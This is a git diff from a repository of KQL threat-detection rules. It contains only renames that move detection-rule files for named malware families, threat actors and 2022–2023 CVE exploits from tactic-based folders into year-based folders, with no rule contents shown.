diff --git a/KQL/rules-emerging-threats/Execution/raspberry_robin_subsequent_execution_of_commands.kql b/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/raspberry_robin_subsequent_execution_of_commands.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/raspberry_robin_subsequent_execution_of_commands.kql
rename to KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/raspberry_robin_subsequent_execution_of_commands.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql b/KQL/rules-emerging-threats/2022/Malware/Serpent-Backdoor/serpent_backdoor_payload_execution_via_scheduled_task.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql
rename to KQL/rules-emerging-threats/2022/Malware/Serpent-Backdoor/serpent_backdoor_payload_execution_via_scheduled_task.kql
diff --git a/KQL/rules-emerging-threats/Execution/fakeupdates_socgholish_activity.kql b/KQL/rules-emerging-threats/2022/Malware/SocGholish/fakeupdates_socgholish_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/fakeupdates_socgholish_activity.kql
rename to KQL/rules-emerging-threats/2022/Malware/SocGholish/fakeupdates_socgholish_activity.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_actinium_persistence_activity.kql b/KQL/rules-emerging-threats/2022/TA/ACTINIUM/potential_actinium_persistence_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/potential_actinium_persistence_activity.kql
rename to KQL/rules-emerging-threats/2022/TA/ACTINIUM/potential_actinium_persistence_activity.kql
diff --git a/KQL/rules-emerging-threats/Execution/mercury_apt_activity.kql b/KQL/rules-emerging-threats/2022/TA/MERCURY/mercury_apt_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/mercury_apt_activity.kql
rename to KQL/rules-emerging-threats/2022/TA/MERCURY/mercury_apt_activity.kql
diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-22518/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql
rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-22518/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql
diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-22518/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql
rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-22518/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql
diff --git a/KQL/rules-emerging-threats/Persistence/outlook_task_note_reminder_received.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-23397/outlook_task_note_reminder_received.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/outlook_task_note_reminder_received.kql
rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-23397/outlook_task_note_reminder_received.kql
diff --git a/KQL/rules-emerging-threats/Persistence/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-27363/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql
rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-27363/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql
diff --git a/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql
rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql
rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql
rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql
rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql
diff --git a/KQL/rules-emerging-threats/Persistence/potential_cve_2023_36884_exploitation_dropped_file.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36884/potential_cve_2023_36884_exploitation_dropped_file.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/potential_cve_2023_36884_exploitation_dropped_file.kql
rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36884/potential_cve_2023_36884_exploitation_dropped_file.kql
diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-38831/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql
rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-38831/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql
diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-38831/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql
rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-38831/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql
diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_40477_potential_exploitation_rev_file_creation.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-40477/cve_2023_40477_potential_exploitation_rev_file_creation.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/cve_2023_40477_potential_exploitation_rev_file_creation.kql
rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-40477/cve_2023_40477_potential_exploitation_rev_file_creation.kql
diff --git a/KQL/rules-emerging-threats/Initial Access/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql b/KQL/rules-emerging-threats/2023/Exploits/Windows-Server-Unknown-Exploit/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Initial Access/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql
rename to KQL/rules-emerging-threats/2023/Exploits/Windows-Server-Unknown-Exploit/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql
diff --git a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_anonymous_user_process_execution.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_anonymous_user_process_execution.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/coldsteel_rat_anonymous_user_process_execution.kql
rename to KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_anonymous_user_process_execution.kql
diff --git a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_cleanup_command_execution.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_cleanup_command_execution.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/coldsteel_rat_cleanup_command_execution.kql
rename to KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_cleanup_command_execution.kql
diff --git a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_service_persistence_execution.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_service_persistence_execution.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/coldsteel_rat_service_persistence_execution.kql
rename to KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_service_persistence_execution.kql
diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_creation.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_persistence_service_dll_creation.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_creation.kql
rename to KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_persistence_service_dll_creation.kql
diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_persistence_service_dll_load.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql
rename to KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_persistence_service_dll_load.kql
diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_file_indicators.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_rat_file_indicators.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_file_indicators.kql
rename to KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_rat_file_indicators.kql
diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_windows_user_creation.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_rat_windows_user_creation.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_windows_user_creation.kql
rename to KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_rat_windows_user_creation.kql
diff --git a/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql b/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_autoit3_exe_execution_parameters.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql
rename to KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_autoit3_exe_execution_parameters.kql
diff --git a/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql b/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql
rename to KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql
diff --git a/KQL/rules-emerging-threats/Persistence/darkgate_user_created_via_net_exe.kql b/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_user_created_via_net_exe.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/darkgate_user_created_via_net_exe.kql
rename to KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_user_created_via_net_exe.kql
diff --git a/KQL/rules-emerging-threats/Execution/griffon_malware_attack_pattern.kql b/KQL/rules-emerging-threats/2023/Malware/Griffon/griffon_malware_attack_pattern.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/griffon_malware_attack_pattern.kql
rename to KQL/rules-emerging-threats/2023/Malware/Griffon/griffon_malware_attack_pattern.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql b/KQL/rules-emerging-threats/2023/Malware/GuLoader/injected_browser_process_spawning_rundll32_guloader_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql
rename to KQL/rules-emerging-threats/2023/Malware/GuLoader/injected_browser_process_spawning_rundll32_guloader_activity.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql b/KQL/rules-emerging-threats/2023/Malware/IcedID/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql
rename to KQL/rules-emerging-threats/2023/Malware/IcedID/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql b/KQL/rules-emerging-threats/2023/Malware/Pikabot/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql
rename to KQL/rules-emerging-threats/2023/Malware/Pikabot/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql
diff --git a/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_c2_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql
rename to KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_c2_activity.kql
diff --git a/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_discovery_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql
rename to KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_discovery_activity.kql
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_hollowing_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql
rename to KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_hollowing_activity.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql
rename to KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_qakbot_rundll32_execution.kql b/KQL/rules-emerging-threats/2023/Malware/Qakbot/potential_qakbot_rundll32_execution.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/potential_qakbot_rundll32_execution.kql
rename to KQL/rules-emerging-threats/2023/Malware/Qakbot/potential_qakbot_rundll32_execution.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/qakbot_regsvr32_calc_pattern.kql b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_regsvr32_calc_pattern.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/qakbot_regsvr32_calc_pattern.kql
rename to KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_regsvr32_calc_pattern.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_exports_execution.kql b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_rundll32_exports_execution.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_exports_execution.kql
rename to KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_rundll32_exports_execution.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_fake_dll_extension_execution.kql b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_rundll32_fake_dll_extension_execution.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_fake_dll_extension_execution.kql
rename to KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_rundll32_fake_dll_extension_execution.kql
diff --git a/KQL/rules-emerging-threats/Execution/qakbot_uninstaller_execution.kql b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_uninstaller_execution.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/qakbot_uninstaller_execution.kql
rename to KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_uninstaller_execution.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql b/KQL/rules-emerging-threats/2023/Malware/Rhadamanthys/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql
rename to KQL/rules-emerging-threats/2023/Malware/Rhadamanthys/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql
diff --git a/KQL/rules-emerging-threats/Execution/rorschach_ransomware_execution_activity.kql b/KQL/rules-emerging-threats/2023/Malware/Rorschach/rorschach_ransomware_execution_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/rorschach_ransomware_execution_activity.kql
rename to KQL/rules-emerging-threats/2023/Malware/Rorschach/rorschach_ransomware_execution_activity.kql
diff --git a/KQL/rules-emerging-threats/Persistence/potential_encrypted_registry_blob_related_to_snake_malware.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_encrypted_registry_blob_related_to_snake_malware.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/potential_encrypted_registry_blob_related_to_snake_malware.kql
rename to KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_encrypted_registry_blob_related_to_snake_malware.kql
diff --git a/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_binary_indicator.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_installation_binary_indicator.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_binary_indicator.kql
rename to KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_installation_binary_indicator.kql
diff --git a/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_cli_arguments_indicator.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_installation_cli_arguments_indicator.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_cli_arguments_indicator.kql
rename to KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_installation_cli_arguments_indicator.kql
diff --git a/KQL/rules-emerging-threats/Execution/potential_snake_malware_persistence_service_execution.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_persistence_service_execution.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/potential_snake_malware_persistence_service_execution.kql
rename to KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_persistence_service_execution.kql
diff --git a/KQL/rules-emerging-threats/Persistence/snake_malware_covert_store_registry_key.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_covert_store_registry_key.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Persistence/snake_malware_covert_store_registry_key.kql
rename to KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_covert_store_registry_key.kql
diff --git a/KQL/rules-emerging-threats/Execution/snake_malware_installer_name_indicators.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_installer_name_indicators.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/snake_malware_installer_name_indicators.kql
rename to KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_installer_name_indicators.kql
diff --git a/KQL/rules-emerging-threats/Execution/snake_malware_kernel_driver_file_indicator.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_kernel_driver_file_indicator.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/snake_malware_kernel_driver_file_indicator.kql
rename to KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_kernel_driver_file_indicator.kql
diff --git a/KQL/rules-emerging-threats/Execution/snake_malware_werfault_persistence_file_creation.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_werfault_persistence_file_creation.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/snake_malware_werfault_persistence_file_creation.kql
rename to KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_werfault_persistence_file_creation.kql
diff --git a/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql b/KQL/rules-emerging-threats/2023/Malware/Ursnif/ursnif_redirection_of_discovery_commands.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql
rename to KQL/rules-emerging-threats/2023/Malware/Ursnif/ursnif_redirection_of_discovery_commands.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/malicious_dll_load_by_compromised_3cxdesktopapp.kql b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/malicious_dll_load_by_compromised_3cxdesktopapp.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/malicious_dll_load_by_compromised_3cxdesktopapp.kql
rename to KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/malicious_dll_load_by_compromised_3cxdesktopapp.kql
diff --git a/KQL/rules-emerging-threats/Command and Control/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Command and Control/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql
rename to KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_execution.kql b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_execution.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_execution.kql
rename to KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_execution.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_update_activity.kql b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_update_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_update_activity.kql
rename to KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_update_activity.kql
diff --git a/KQL/rules-emerging-threats/Command and Control/potential_suspicious_child_process_of_3cxdesktopapp.kql b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_suspicious_child_process_of_3cxdesktopapp.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Command and Control/potential_suspicious_child_process_of_3cxdesktopapp.kql
rename to KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_suspicious_child_process_of_3cxdesktopapp.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/dll_names_used_by_svr_for_graphicalproton_backdoor.kql b/KQL/rules-emerging-threats/2023/TA/Cozy-Bear/dll_names_used_by_svr_for_graphicalproton_backdoor.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/dll_names_used_by_svr_for_graphicalproton_backdoor.kql
rename to KQL/rules-emerging-threats/2023/TA/Cozy-Bear/dll_names_used_by_svr_for_graphicalproton_backdoor.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_dll_sideloading_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_dll_sideloading_indicators.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_dll_sideloading_indicators.kql
rename to KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_dll_sideloading_indicators.kql
diff --git a/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_file_creation_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_file_creation_indicators.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/diamond_sleet_apt_file_creation_indicators.kql
rename to KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_file_creation_indicators.kql
diff --git a/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_process_activity_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_process_activity_indicators.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/diamond_sleet_apt_process_activity_indicators.kql
rename to KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_process_activity_indicators.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_scheduled_task_creation_registry.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql
rename to KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_scheduled_task_creation_registry.kql
diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql b/KQL/rules-emerging-threats/2023/TA/FIN7/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql
rename to KQL/rules-emerging-threats/2023/TA/FIN7/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql
diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_related_powershell_script_created.kql b/KQL/rules-emerging-threats/2023/TA/FIN7/potential_apt_fin7_related_powershell_script_created.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/potential_apt_fin7_related_powershell_script_created.kql
rename to KQL/rules-emerging-threats/2023/TA/FIN7/potential_apt_fin7_related_powershell_script_created.kql
diff --git a/KQL/rules-emerging-threats/Execution/lace_tempest_cobalt_strike_download.kql b/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_cobalt_strike_download.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/lace_tempest_cobalt_strike_download.kql
rename to KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_cobalt_strike_download.kql
diff --git a/KQL/rules-emerging-threats/Execution/lace_tempest_file_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_file_indicators.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/lace_tempest_file_indicators.kql
rename to KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_file_indicators.kql
diff --git a/KQL/rules-emerging-threats/Execution/lace_tempest_malware_loader_execution.kql b/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_malware_loader_execution.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Execution/lace_tempest_malware_loader_execution.kql
rename to KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_malware_loader_execution.kql
diff --git a/KQL/rules-emerging-threats/Defense Evasion/lazarus_apt_dll_sideloading_activity.kql b/KQL/rules-emerging-threats/2023/TA/Lazarus/lazarus_apt_dll_sideloading_activity.kql
similarity index 100%
rename from KQL/rules-emerging-threats/Defense Evasion/lazarus_apt_dll_sideloading_activity.kql
rename to KQL/rules-emerging-threats/2023/TA/Lazarus/lazarus_apt_dll_sideloading_activity.kql
diff --git a/KQL/rules-emerging-threats/Execution/mint_sandstorm_asperafaspex_suspicious_process_execution.kql b/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_asperafaspex_suspicious_process_execution.kql
similarity index 100%
